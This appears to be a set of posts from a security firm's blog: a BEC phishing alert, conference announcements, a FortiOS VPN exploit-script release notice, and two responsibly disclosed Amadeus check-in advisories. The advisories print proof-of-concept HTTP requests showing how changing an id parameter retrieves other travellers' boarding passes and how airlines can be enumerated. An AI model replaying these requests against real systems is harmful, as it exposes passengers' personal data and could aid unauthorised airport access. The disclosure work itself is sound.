BEC Attacks via LinkedIn Email

A new business email compromise (BEC) based campaign using compromised LinkedIn profiles to deliver content was identified by the team at 7 Elements today (7th November 2019).

The campaign uses LinkedIn email to deliver a message enticing the user to follow a link, which would result in the user being prompted for credentials. The phishing kit is complex in nature, supporting multiple email providers such as Office 365, Gmail and Hotmail. Analysis of the kit also showed inbuilt defensive capabilities designed to disrupt investigation by security vendors.

The following video demonstrates how an end user could be enticed to provide their email credentials via this campaign:

The campaign started at 07:03hrs on the 7th November 2019 and was still active at the point of publishing this advisory at 21:45hrs (14hrs later). In this period there had been over 1,900 visits to the phishing site, with 670 (35%) of those from the UK.

More detailed analysis of the phishing kit will follow in a later post.

 

CyberIsle2019

October the 23rd saw the inaugural Isle of Man Government Cyber Security Conference – ‘CyberIsle 2019‘, where our CEO David Stubley was invited to speak on the subject of Business Email Compromise (BEC).

The talk covered the motivations for malicious actors looking to conduct such attacks, the anatomy of a successful attack and then three case studies based upon real life incidents that the team here at 7 Elements have managed for our clients.

The talk finished with mitigation advice that can be deployed by any organisation to reduce the risk of a successful compromise. The following document provides an overview of BEC and the core content from the presentation:

Anatomy of a BEC Attack – Release

The talk also looked at how malicious actors can gain credentials via attacks against externally facing infrastructure, such as Virtual Private Network (VPN) devices. More information on this can be found here: http://www.7elements.co.uk/resources/research/exploit-script-cve-2018-13379/

If you would like to discuss how to gain assurance over cloud based email solutions such as Office 365 then please get in touch with the team.

Exploit Script for CVE-2018-13379

While conducting further analysis of the path traversal vulnerability within the FortiOS SSL VPN web portal, the team at 7 Elements created a script to enumerate vulnerable hosts and extract sensitive information such as user names and passwords.

The following video shows the tool in action with the ability to scan multiple hosts (the script used for the purpose of the video masks sensitive information):

Using the script it was possible to enumerate ~200k hosts globally, identifying around 20,000 vulnerable hosts and extract over 60,000 credentials (further blog post to follow).

Both the NSA and NCSC have recently posted advisories alerting on the use of this vulnerability by Nation State Advanced Persistent Threat (APT) actors to gain access to enterprise environments.

Over three weeks prior to the advisories, the team here at 7 Elements identified that what was then being reported as a medium level risk issue, was in fact a critical impact issue. More on that can be found here.

Today we have released a  version of the script that is limited to a single IP/Host to enable testing against devices owned by the individual running the script. The tool can be downloaded here.

 

CYBERISLE 2019

CYBERISLE 2019 is the Isle of Man government’s flagship cyber security event.

Hosted by the Office of Cyber Security & Information Assurance (OCSIA), CYBERISLE 2019 features world-class speakers, solutions and opportunities for interaction between the public and private sectors. The event is free to attend and will be at the Royal Hall, Villa Marina, Douglas, Isle of Man on the 23rd October 2019.

As part of the event, our CEO, Dave Stubley will deliver a talk on Protecting the Enterprise: Business Email Compromise.

Talk Introduction:

What does a successful compromise of an organisations email system look like and what can we do to protect ourselves?

A recent study by the U.S. Treasury Department revealed that business email compromise scams were costing U.S. companies more than $300 million a month, and the FBI warned that the total financial loss globally due to BEC attacks is at least $12.5 billion. Closer to home: UK’s National Cyber Security Centre (NCSC) reported that BEC attacks cost UK businesses £32 million (in 2017/18).

This talk will use real-life case studies from recent incidents to dissect the anatomy of a modern Business Email Compromise (BEC) attack, from current attack trends to mailbox manipulation and exfiltration of sensitive data through to onward compromise of new mailboxes. Building on this knowledge we will then explore easy to implement mitigation strategies.

For more information about CYBERISLE 2019 and to register, please visit the events page here.

Airline Enumeration within Amadeus Check-in Application

Advisory Information

Title: Airline Enumeration within Amadeus Check-in Application

Date Published: 16th July 2019

Author: David Stubley, david.stubley@7elements.co.uk, @DavidStubley (twitter)

Advisory Summary

It was possible to enumerate supported airlines of the Amadeus Check-in Application using the URL generated as part of an airline mobile application check-in process.

Example of a link to a boarding pass generated by the platform:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=440968951&ln=en&productIndex=0

(URL provided is no longer valid as it is past the departure time).

The highlighted ‘QS‘ relates to the use of IATA airline codes.

PoC

The following proof of concept shows that due to a lack of authentication required for access to the resource as well as a lack of brute force protection, it was possible to automate an attack to enumerate supported airlines.

Request

GET /1ASIHSSCWEB§OA§/sscw§oa§/mbp?IFOI=DCS&id=300193064&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Jul 2019 11:48:30 GMT
Content-Type: text/html
Connection: close
Content-Length: 7078

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>Olympic Air Internet check in</title>

Using Burp to do the heavy lifting:

Timeline

Advisory sent – 10th July 2019

Requested confirmation that the advisory has been received by Amadeus – 11th July 2019

Update and confirmation that Amadeus are taking remediation action (advised via FlyBe) – 11th July 2019

Advised Civil Aviation Authority (CAA) on vulnerability – 11th July 2019

Requested update from Amadeus and provided notice to publish – 12th July 2019

Remediation activity completed by Amadeus (based upon dates provided by FlyBe) – 15th July 2019

Advisory published by 7 Elements – 16th July 2019

Insecure Direct Object Reference within Amadeus Check-in Application

Advisory Information

Title: Insecure Direct Object Reference within Amadeus Check-in Application

Date Published: 16th July 2019

Author: David Stubley, david.stubley@7elements.co.uk, @DavidStubley (twitter)

Advisory Summary

It was possible to download valid boarding passes (not belonging to the user) for future flights due to a weakness within the application (Insecure Direct Object Reference).

Example of a link to a boarding pass not belonging to the user:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=300193064&ln=en&productIndex=0

Insecure Direct Object Reference or IDOR vulnerabilities occur when an application provides direct access to objects based on user-supplied input, bypassing expected authentication and user access controls.

The vulnerable site is: https://checkin.si.amadeus.net

The vulnerable parameter is the ID field within the /mbp application end point.

PoC

The following proof of concept shows access to a boarding pass not associated with the user.

Step One: First intercept a request to generate a boarding pass:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:41:28 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70581

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Step Two: Change to the id parameter to access a boarding pass not associated with the user:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=10442131&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:44:13 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70764

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Response shows a valid pdf document returned to the user.

Timeline

Advisory sent – 8th July 2019 (to FlyBe), 10th July 2019 (to Amadeus)

Requested confirmation that the advisory has been received by Amadeus – 11th July 2019

Update and confirmation that Amadeus are taking remediation action (advised via FlyBe) – 11th July 2019

Advised Civil Aviation Authority (CAA) on vulnerability – 11th July 2019

Requested update from Amadeus and provided notice to publish  – 12th July 2019

Remediation activity completed by Amadeus (based upon dates provided by FlyBe) – 15th July 2019

Advisory published by 7 Elements – 16th July 2019

I know what you did this summer…

Introduction

In a recent technical advisory that can be found here, 7 Elements discovered that it was possible to download valid boarding passes (not belonging to the user) for future flights that impacted all airlines using the Amadeus Check-in platform. This was due to a weakness within the application known as an IDOR vulnerability (Insecure Direct Object Reference). See OWASP for more background on IDOR.

The following images show two boarding passes obtained through the IDOR vulnerability before the issue was remediated by Amadeus:

 

Impact

The IDOR vulnerability combined with the ability to determine all airlines using the platform, makes this an issue that impacts Amadeus globally and impacted all airlines utilising the platform. The issue also highlights the importance of gaining assurance that commercial off-the-shelf (COTS) based solutions are fit for purpose and not placing trust in the solution providers hands. As with most things in life, the old saying of ‘Trust but Verify’ is still king.

PII – Downloading of valid boarding passes discloses customer names and flight details. The boarding pass also contains the booking reference. With that and the surname it would be possible to gain access to the booking and further sensitive information such as contact details (mobile phone etc).

Access to Restricted Areas – While further ID checks should prohibit actual use of another users boarding pass to gain access to the flight. The boarding pass could provide access to airside within the departure terminal. As such, malicious use of this issue could result in unauthorised access to all airports serviced by those airlines using the Amadeus platform. It should be noted that additional security controls may restrict the successful use of a boarding pass that has already been used to gain access airside. However, those controls are not uniformly deployed across all airports.

Details

When using an airline branded mobile application to check-in, it was noted that the mobile application makes a call to the Amadeus hosted application to retrieve the boarding pass.

Screenshot showing the link to ‘Display Boarding Passes’:

Clicking on the link prompts the following response:

Opening a new web page to display the boarding pass.

The URL accessed contains a parameter called ID. By changing the value within the ID parameter, it was possible to access other valid boarding passes.

Example URL:

https://checkin.si.amadeus.net/1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0

The structure of the web request allows for other airlines that utilise the Amadeus platform to be targeted by changing the following two letter codes to match the relevant IATA airline code:

Example of a FlyBe request:

https://checkin.si.amadeus.net/1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0

Example of a Smartwings request:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=440968951&ln=en&productIndex=0

(URLs provided are no longer valid as it is past the departure time).

Further to the IDOR vulnerability, it should be noted that there was a lack of authentication required for access to the resource as well as a lack of brute force protection. Given this, it was possible to automate an attack to enumerate supported airlines and valid ID values for boarding passes relating to any airline using the platform.

Screenshot showing the enumeration of airline companies using the Check-in platform:

PoC

The following proof of concept shows access to a boarding pass not associated with the user.

Step One: First intercept a request to generate a boarding pass:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:41:28 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70581

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Two: Change to the id parameter to access a boarding pass not associated with the user:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=10442131&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:44:13 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70764

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Response shows a valid pdf document returned to the user.

 

Threat Hunting

The sides from ‘Threat Hunting in the O365 Ecosystem’ given at the International Conference on Big Data in Cyber Security are now online and can be found here:

.

The video of the talk can be found here:

DL100 Cyber Resilience Innovation of the Year

7 Elements shortlisted in DL100 Cyber Resilience Innovation of the Year category for second year!

7 Elements are delighted that our Incident Response Partnership has been shortlisted for the second year in a row in the DL100 Cyber Resilience Innovation of the Year category. We are very proud of our incident response service and are excited by the external recognition we are gaining from our peers!

What makes our approach different? In short, no up-front costs and establishing a robust partnership model that delivers when needed. Our partnership clients only ever pay for effort that they use and based on agreed upfront costs, so that there are no unwelcome surprises.

David Stubley, CEO 7 Elements

Positive and robust cyber resilience is now a fundamental business enabler. The ability of organised criminal gangs and motivated attackers to target organisations via the Internet has increased to a level where they are capable of executing attacks with little financial outlay, that can result in huge financial gain for them, while causing both financial loss and reputational damage for the targeted organisation. Even non-targeted attacks can have catastrophic consequences and result in down time and financial loss. Having a robust approach to incident response that is both flexible and proportional is now a key requirement for any organisation doing business online. Our incident response partnership is designed to give SME’s access to the same level of incident response services as Blue-chip companies without the high costs.

Recent feedback from one of our clients dealing with a breach that resulted in financial loss:

We engaged 7 Elements to help us while dealing with a recent security issue. We found them to be extremely responsive and able to present their findings with real clarity, together with a comprehensive step by step plan. Which on implementation, allowed us to give confidence to our Board and shareholders that the issues were not only understood but that all measures had been taken to ensure that there would be no repeat in future. We would recommend anyone not to rely solely on their IT provider, but to obtain advice on security from an expert, as prevention is the best cure and compromising on cybersecurity can prove extremely costly. We continue to work with David and his team at 7 Elements and cannot recommend them highly enough.

CFO, Commercial Property Developer

 

If you would like to know more and get on the front foot when dealing with cyber security incidents, then get in touch with the team.

As of the 12th April 2018, voting has now opened for each of the DL100 categories and we would like to take this opportunity to ask for your vote.

The DL100 winners will be announced at the awards dinner on the 21st June at the Sheraton Grand in London.

 

More information on our Incident Response Partnership can be found here.

International Conference of Big Data in Cyber Security

International Conference of Big Data in Cyber Security

Our CEO, David Stubley will be speaking in Edinburgh at the International Conference on Big Data in Cyber Security on the 31st May 2018 at Napier University. With the threats to organisations increasing day by day, many organisations are moving towards SIEM (Secure Incident Event Management) to detect malicious activity. SIEM is now being applied in many different processes across the industry including security monitoring, incident response and cyber crime investigation.

The big data conference brings together industry, academia and law enforcement to share insights, ideas, expertise and resources in responding to current security challenges, and to look at the opportunities and challenges in managing and using big data in a cyber security context. The conference also aims to showcase a good practice in industry and network investigations.

The conference hopes to cover the following areas:

  • insights into current high-profile security incidents, their impact, and how they are reported.
  • impact of GDPR.
  • key threats and risks associated with losing business critical data.
  • leading tools, techniques and insights in network threat analysis, detection and investigation.
  • best practice in implementing SIEM strategy.
  • developing and testing effective incident response.
  • evolution of the Security Operations Centre (SOC) and its emerging future requirements.
  • the need for skills, knowledge and awareness across an organisation.
  • latest research and innovation around threat discovery, machine learning, and data analysis.

David Stubley will be discussing ‘threat hunting in the Office 365 ecosystem’ at 2 pm in the Lindsay Stewart Theatre.

If you would like to know more about how we approach incident response, then please get in touch with our team.